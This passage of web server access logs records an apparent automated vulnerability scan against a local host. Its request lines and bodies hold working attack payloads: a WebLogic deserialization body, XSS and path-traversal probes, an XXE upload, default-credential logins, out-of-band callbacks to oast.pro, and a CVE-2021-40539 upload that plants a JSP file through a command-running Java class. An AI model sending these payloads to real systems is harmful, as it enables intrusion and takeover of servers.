class=\x22java.lang.Thread\x22 method=\x22currentThread\x22><void method=\x22getCurrentWork\x22 id=\x22current_work\x22><void method=\x22getClass\x22><void method=\x22getDeclaredField\x22><string>connectionHandler</string><void method=\x22setAccessible\x22><boolean>true</boolean></void><void method=\x22get\x22><object idref=\x22current_work\x22></object><void method=\x22getServletRequest\x22><void method=\x22getResponse\x22><void method=\x22getServletOutputStream\x22><void method=\x22writeStream\x22><object class=\x22weblogic.xml.util.StringInputStream\x22><object idref=\x22result\x22></object></object></void><void method=\x22flush\x22/></void><void method=\x22getWriter\x22><void method=\x22write\x22><string></string></void></void></void></void></void></void></void></void></void></java>","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wls-wsat/CoordinatorPortType HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /errors/errors.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /xprober.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/infusionsoft/Infusionsoft/examples/leadscoring.php?ContactId=%22%3E%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E%3C%22 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"--29KBxYzORd8HIqa4iOFt20Ibuuc\x0D\x0AContent-Disposition: form-data; name=\x2229KBxZO9KqlTLgZNxV0Dfry9TwV\x22; filename=\x2229KBxaoKgrUfMnnXCKYOaAKEbxk.xml\x22\x0D\x0AContent-Type: application/xml\x0D\x0A\x0D\x0A\x0D\x0A \x0D\x0A \x0D\x0A ALttP\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A 12345\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A--29KBxYzORd8HIqa4iOFt20Ibuuc\x0D\x0AContent-Disposition: form-data; name=\x2229KBxckmpO52TiWW3bzBRoy2WUb\x22; filename=\x2229KBxbK2eRdUv2ThJxq9aRnBFk5.xml\x22\x0D\x0AContent-Type: application/xml\x0D\x0A\x0D\x0A\x0D\x0A ]>\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A &xxe;\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A--29KBxYzORd8HIqa4iOFt20Ibuuc--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /XMLCHART HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%EF%BD%B0example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=feedwordpress%2Fsyndication.php&visibility=%22%3E%3Cimg+src%3D2+onerror%3Dalert%28document.domain%29%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"PURGE / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"PURGE", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ReportServer?op=fr_server&cmd=sc_getconnectioninfo HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /modules/system/assets/js/framework.combined-min.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"username=admin&password=admin","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login.php?action=login&type=admin HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/forget-about-shortcode-buttons/assets/js/fasc-buttons/popup.php?source=1&ver=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /error/error.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?p=banlist&advSearch=0%27%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&advType=btype HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Login.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ccmivr/IVRGetAudioFile.do?file=../../../../../../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?page=example.com&_url=example.com&callback=example.com&checkout_url=example.com&content=example.com&continue=example.com&continueTo=example.com&counturl=example.com&data=example.com&dest=example.com&dest_url=example.com&dir=example.com&document=example.com&domain=example.com&done=example.com&download=example.com&feed=example.com&file=example.com&host=example.com&html=example.com&http=example.com&https=example.com&image=example.com&image_src=example.com&image_url=example.com&imageurl=example.com&include=example.com&langTo=example.com&media=example.com&navigation=example.com&next=example.com&open=example.com&out=example.com&page=example.com&page_url=example.com&pageurl=example.com&path=example.com&picture=example.com&port=example.com&proxy=example.com&redir=example.com&redirect=example.com&redirectUri=example.com&redirectUrl=example.com&reference=example.com&referrer=example.com&req=example.com&request=example.com&retUrl=example.com&return=example.com&returnTo=example.com&return_path=example.com&return_to=example.com&rurl=example.com&show=example.com&site=example.com&source=example.com&src=example.com&target=example.com&to=example.com&uri=example.com&url=example.com&val=example.com&validate=example.com&view=example.com&window=example.com&redirect_to=example.com&ret=example.com&r2=example.com&img=example.com&u=example.com&r=example.com&URL=example.com&AuthState=example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /adminer?elastic=example.com&username= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/redirection/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /WebReport/ReportServer?op=fr_server&cmd=sc_getconnectioninfo HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webadmin/policy/group_table_ajax.php/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"--8b1ab266c41afb773af2e064bc526458\x0D\x0AContent-Disposition: form-data; name=\x22methodToCall\x22\x0D\x0A\x0D\x0Aunspecified\x0D\x0A--8b1ab266c41afb773af2e064bc526458\x0D\x0AContent-Disposition: form-data; name=\x22Save\x22\x0D\x0A\x0D\x0Ayes\x0D\x0A--8b1ab266c41afb773af2e064bc526458\x0D\x0AContent-Disposition: form-data; name=\x22form\x22\x0D\x0A\x0D\x0Asmartcard\x0D\x0A--8b1ab266c41afb773af2e064bc526458\x0D\x0AContent-Disposition: form-data; name=\x22operation\x22\x0D\x0A\x0D\x0AAdd\x0D\x0A--8b1ab266c41afb773af2e064bc526458\x0D\x0AContent-Disposition: form-data; name=\x22CERTIFICATE_PATH\x22; filename=\x22ws.jsp\x22\x0D\x0A\x0D\x0A<%@ page import=\x22java.util.*,java.io.*\x22%>\x0D\x0A<%@ page import=\x22java.security.MessageDigest\x22%>\x0D\x0A<%\x0D\x0AString cve = \x22CVE-2021-40539\x22;\x0D\x0AMessageDigest alg = MessageDigest.getInstance(\x22MD5\x22);\x0D\x0Aalg.reset();\x0D\x0Aalg.update(cve.getBytes());\x0D\x0Abyte[] digest = alg.digest();\x0D\x0AStringBuffer hashedpasswd = new StringBuffer();\x0D\x0AString hx;\x0D\x0Afor (int i=0;i\x0D\x0A--8b1ab266c41afb773af2e064bc526458--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /./RestAPI/LogonCustomization HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /provider.tf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /errors.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?wp_nlm=confirmation&appurl=aHR0cDovL2F0dGFja2VyLmNvbQ== HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /config/getuser?index=0 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?s=Admin-Data-down&id=../../Conf/config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /adm/krgourl.php?DOCUMENT_ROOT=http://ca28bc0smpvbbtig07h0z1smejpcmbnbr.oast.pro HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"USERNAME=admin&PASSWORD=ofbiz&FTOKEN=&JavaScriptEnabled=Y","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /control/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /lua/%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2ffind_prefs.lua.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /demo/file/../../../../../../../../etc/passwd%00filename.mp4/chunk.m3u8?nimblesessionid=1484448 HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.002","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pages/UI.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"{\x22test_type\x22:\x22ip\x22,\x22test_debug\x22:false,\x22ipnotify_type\x22:\x22http/get\x22,\x22ipnotify_address\x22:\x22http://ca28bc0smpvbbtig07h088151cehz6ibe.oast.pro\x22,\x22ipnotify_username\x22:\x22\x22,\x22ipnotify_password\x22:\x22\x22,\x22ipnotify_port\x22:\x220\x22,\x22ipnotify_content_type\x22:\x22\x22,\x22ipnotify_template\x22:\x22\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cps/test_backup_server?ACTION=TEST_IP&NOCONTINUE=TRUE HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"--43992a07d9a30213782780204a9f032b\x0D\x0AContent-Disposition: form-data; name=\x22methodToCall\x22\x0D\x0A\x0D\x0Aunspecified\x0D\x0A--43992a07d9a30213782780204a9f032b\x0D\x0AContent-Disposition: form-data; name=\x22Save\x22\x0D\x0A\x0D\x0Ayes\x0D\x0A--43992a07d9a30213782780204a9f032b\x0D\x0AContent-Disposition: form-data; name=\x22form\x22\x0D\x0A\x0D\x0Asmartcard\x0D\x0A--43992a07d9a30213782780204a9f032b\x0D\x0AContent-Disposition: form-data; name=\x22operation\x22\x0D\x0A\x0D\x0AAdd\x0D\x0A--43992a07d9a30213782780204a9f032b\x0D\x0AContent-Disposition: form-data; name=\x22CERTIFICATE_PATH\x22; filename=\x22Si.class\x22\x0D\x0A\x0D\x0A\xCA\xFE\xBA\xBE\x00\x00\x004\x00(\x0D\x0A\x00\x0C\x00\x16\x0D\x0A\x00\x17\x00\x18\x07\x00\x19\x08\x00\x1A\x08\x00\x1B\x08\x00\x1C\x08\x00\x1D\x08\x00\x1E\x0D\x0A\x00\x17\x00\x1F\x07\x00 \x07\x00!\x07\x00\x22\x01\x00\x06\x01\x00\x03()V\x01\x00\x04Code\x01\x00\x0FLineNumberTable\x01\x00\x08\x01\x00\x0D\x0AStackMapTable\x07\x00 \x01\x00\x0D\x0ASourceFile\x01\x00\x07Si.java\x0C\x00\x0D\x0A\x00\x0E\x07\x00#\x0C\x00$\x00%\x01\x00\x10java/lang/String\x01\x00\x03cmd\x01\x00\x02/c\x01\x00\x04copy\x01\x00\x06ws.jsp\x01\x00*..\x5Cwebapps\x5Cadssp\x5Chelp\x5Cadmin-guide\x5Ctest.jsp\x0C\x00&\x00'\x01\x00\x13java/io/IOException\x01\x00\x02Si\x01\x00\x10java/lang/Object\x01\x00\x11java/lang/Runtime\x01\x00\x0D\x0AgetRuntime\x01\x00\x15()Ljava/lang/Runtime;\x01\x00\x04exec\x01\x00(([Ljava/lang/String;)Ljava/lang/Process;\x00!\x00\x0B\x00\x0C\x00\x00\x00\x00\x00\x02\x00\x01\x00\x0D\x0A\x00\x0E\x00\x01\x00\x0F\x00\x00\x00\x1D\x00\x01\x00\x01\x00\x00\x00\x05*\xB7\x00\x01\xB1\x00\x00\x00\x01\x00\x10\x00\x00\x00\x06\x00\x01\x00\x00\x00\x02\x00\x08\x00\x11\x00\x0E\x00\x01\x00\x0F\x00\x00\x00d\x00\x05\x00\x02\x00\x00\x00+\xB8\x00\x02K*\x08\xBD\x00\x03Y\x03\x12\x04SY\x04\x12\x05SY\x05\x12\x06SY\x06\x12\x07SY\x07\x12\x08S\xB6\x00\x09L\xA7\x00\x04K\xB1\x00\x01\x00\x00\x00&\x00)\x00\x0D\x0A\x00\x02\x00\x10\x00\x00\x00\x12\x00\x04\x00\x00\x00\x05\x00\x04\x00\x06\x00&\x00\x07\x00*\x00\x08\x00\x12\x00\x00\x00\x07\x00\x02i\x07\x00\x13\x00\x00\x01\x00\x14\x00\x00\x00\x02\x00\x15\x0D\x0A--43992a07d9a30213782780204a9f032b--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /./RestAPI/LogonCustomization HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"{\x0D\x0A \x22type\x22:\x22bulk\x22,\x0D\x0A \x22args\x22:[\x0D\x0A {\x0D\x0A \x22type\x22:\x22add_remote_schema\x22,\x0D\x0A \x22args\x22:{\x0D\x0A \x22name\x22:\x22test\x22,\x0D\x0A \x22definition\x22:{\x0D\x0A \x22url\x22:\x22https://ca28bc0smpvbbtig07h0xodocmkhziydh.oast.pro\x22,\x0D\x0A \x22headers\x22:[\x0D\x0A ],\x0D\x0A \x22timeout_seconds\x22:60,\x0D\x0A \x22forward_client_headers\x22:true\x0D\x0A }\x0D\x0A }\x0D\x0A }\x0D\x0A ]\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/query HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /error.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /asynchPeople/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/hmapsprem/views/dashboard/index.php?p=/wp-content/plugins/hmapsprem/foo%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/quiz-master-next/README.md HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET 